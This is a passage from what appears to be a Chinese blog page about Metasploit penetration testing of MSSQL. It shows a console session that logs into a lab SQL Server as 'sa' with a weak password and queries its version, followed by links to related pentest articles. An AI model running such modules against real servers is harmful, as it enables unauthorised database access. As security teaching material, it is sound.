   SQL                  select @@version  no        The SQL query to execute
   TDSENCRYPTION        false             yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false             yes       Use windows authentification (requires DOMAIN option set)

msf auxiliary(admin/mssql/mssql_sql) > set RHOST 192.168.109.139
RHOST => 192.168.109.139
msf auxiliary(admin/mssql/mssql_sql) > set PASSWORD 123456
PASSWORD => 123456
msf auxiliary(admin/mssql/mssql_sql) > run

[*] 192.168.109.139:1433 - SQL Query: select @@version
[*] 192.168.109.139:1433 - Row Count: 1 (Status: 16 Command: 193)



 NULL
 ----
 Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64) 
	Jun 28 2012 08:36:30 
	Copyright (c) Microsoft Corporation
	Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)


[*] Auxiliary module execution completed
msf auxiliary(admin/mssql/mssql_sql) >

 

冰 河
关注
专栏目录
metasploit渗透框架使用说明——后面介绍后渗透模块和网络渗透
记录并分享学习安全的知识点..
01-04 1055
一、模块划分 MSF是渗透测试领域最流行的渗透测试框架,它有以下几个模块:辅 助 模 块 (Auxiliary,扫描器)——扫描主机系统,寻找可用漏洞;渗透攻击模块 (Exploits)——选择并配置一个漏洞利用模块;攻击载荷模块 (Payloads)——选择并配置一个攻击载荷模块;后渗透攻击模块 (Post)——用于内网渗透的各种操作;编 码 器 模 块 (Encoders)——选择编码技术,绕过杀软(或其他免杀方式);; 所有模块位置:/usr/share/metasploit-framework/m
提权学习之旅——利用Metasploit提权
Lemon's blog
08-16 717
1
MSSQL上传漏洞利用工具
01-02
MSSQL上传漏洞利用工具,检测网页漏洞的一款软件
Metasploit-MSSQL渗透-实战篇
热门推荐
eT48_Sec
12-24 1万+
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。 打开metasploit的控制台终端: 先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。 从扫描结果中,我们得知目标对外开放了1433端口对应于ms
利用Nmap对MSSQL进行渗透测试
最新发布
Palpitate_LL的博客
07-26 818
利用nmap脚本对MS SQL Server 进行渗透测试,获取吗目标用户名、数据库表等信息。
使用metasploitSQL server渗透测试提权
渗透测试
05-11 847
文章目录前言一、使用nmap进行踩点二、使用metasploit进行扫描三、破解sqlserver密码四、查找服务器其他用户口令五、浏览SQL server六、后渗透总结 前言 简单介绍了使用metasploitSQL server进行渗透测试提权 一、使用nmap进行踩点 db_nmap -sV -p1433 1434 192.168.1.106 #使用nmap进行扫描 services #显示出服务 db_namp -sU --script=ms-sql-info -p1434 192.168.1
使用Metasploit对MSSQL渗透测试步骤——学习笔记
渗透测试
06-04 1093
学习笔记 使用metasploit对MSSQL渗透测试方法(因为本人靶机没有mssql服务,所以只有方法hh) 第一步,使用mssql_ping获取信息 Name: MSSQL Ping Utility Module: auxiliary/scanner/mssql/mssql_ping License: Metasploit Framework License (BSD) Rank: Normal Provided by: MC <mc@metasploit.
mssql数据库渗透测试
weixin_43708659的博客
06-17 378
mssql数据库渗透测试
数据库开发——精典
09-29 3659
1.按姓氏笔画排序:Select * From TableName Order By CustomerName Collate Chinese_PRC_Stroke_ci_as 2.数据库加密:select encrypt(原始密码)select pwdencrypt(原始密码)select pwdcompare(原始密码,加密后密码) = 1--相同;否则不相同3.取回表中字段:
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4495
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2212
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
mysql服务攻击检测_【渗透测试要点】MySQL攻击面和提权总结
weixin_34980267的博客
01-27 602
原标题:【渗透测试要点】MySQL攻击面和提权总结本次实验使用腾讯云主机的MySQL Server作为服务端,阿里云主机作为MySQL客户端。其中均使用宝塔面板搭建MySQL8.0版本。首先要开放腾讯云主机的端口,并且允许MySQL Server允许任意用户远程登录。1攻击面——MySQL客户端任意文件读取适用范围:全版本 MySQL/MariaDB Client条件:客户端连接时开启 –enab...
实战复盘:内网环境渗透ms-SQL数据库
2401_84466227的博客
05-26 1218
鼠标放到下面蓝色区域,右键选择 as Escaped String,再粘贴到编辑器中,变成如下图所示,需要手工处理一下,对照上副图,下图中删除白底数据,保留蓝底数据,然后删除头尾的引号、斜杠等,使它变成一个标准的二进制格式的字符串,它就是我们抽取的原始sql字符串,然后,复制到后面sql_replace.js截图的第7行。-----表示替换失败。第一个是onLoad(),bettercap运行成功后,会在屏幕上提示:tcp module loader ----------------;
MS-SQL数据库系统表的总结与应用
MinSen
03-17 870
有一个是用Rollback Transaction来回滚操作 Select * From master.dbo.sysdatabases 查询本数据库信息 ----------------------------------------------------------------------------------------------------------------------
MS SQL Server 数据库(基础篇)
黑夜中的潜行者
03-17 4258
1.0 数据库及数据库系统 1.1数据库是什么 1.2 数据库系统(DBS) 1.3 数据库管理系统(DBMS) 1.4 数据库的作用 1.5 应用程序 1.6 注 2.0 管理数据库 2.1 创建数据库 2.2 判断数据库是否存在 2.3 使用数据库 2.4 删除数据库 2.5 创建数据表 2.6 判断表是否存在 2.7 删除数据表 2.8 判断某表的某字段是否存在 3.0 SQL Server 数据类型 4.0 数据完整性 5.0 创建约束
MSSQL数据库分析
宋海宾的博客
01-26 478
1. 库管理 1.1 登录数据库 mssql-cli -S 100.1.1.1,1433 -U userName -P password 1.2 查看数据库列表 通过mssql-cli 工具查看 \ld 查看数据库列表 \ld xxx 查看包含xxx字符串的数据库 select name from master…sysdatabases order by name 通过DQL查看 是否添加master均可 select name from master…sysdatabases order
ms-sql是mysql吗_mssql和mysql有哪些区别?
weixin_42349787的博客
02-17 525
《mssql和MysqL有哪些区别?》要点:本文介绍了mssql和MysqL有哪些区别?,希望对您有用。如果有疑问,可以联系我们。打开以前的笔记,这是一篇老文章了,不过做mssql转换成MysqL的工作还是会有用的,跟大家分享一下。1 MysqL支持enum,和set类型,sql server不支持2 MysqL不支持nchar,nvarchar,ntext类型3 MysqL的递增语句是AUTO_...
MSSQL基本使用
技术超强的网络安全平台
12-01 6717
0x00 简介 Microsoft SQL Sever 分为很多个版本,版本的不断的升级安全性也越来越高,对我们渗透过程中最喜欢的版本应该就是2008以前,在2008及其以后的版本数据库的权限已经不再是system,为了迎合新的版本我接下来的实验都在2008版本下面进行,同时也介绍以前可以利用的方法,相对于MySQL这个mssql显得重了许多,他众多的功能也给我们注入过程带来了便利,所以一般数据库为mssql支持多语句我们就考虑是不是应该直接拿下webshell。 0x01 默认库的介绍 master
最近一段时间都在弄sybase和ms-sqlserver,写了一份学习笔记
超级无敌小地主
08-01 2995
 [精华] 最近一段时间都在弄sybase和ms-sqlserver,写了一份学习笔记2007-06-21 23:11 [精华] 最近一段时间都在弄sybase和ms-sqlserver,写了一份学习笔记 可能内容有些没章法。以前在坛上
kali linux渗透实战metasploit
04-11
使用Kali Linux操作系统可以使用Metasploit工具进行渗透测试。 Metasploit是一款功能强大的框架,可用于漏洞分析和漏洞利用。它具有多种模块,包括扫描、漏洞利用和后渗透攻击。使用它可以对系统进行测试,寻找系统中的漏洞并建议必要的补丁程序。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值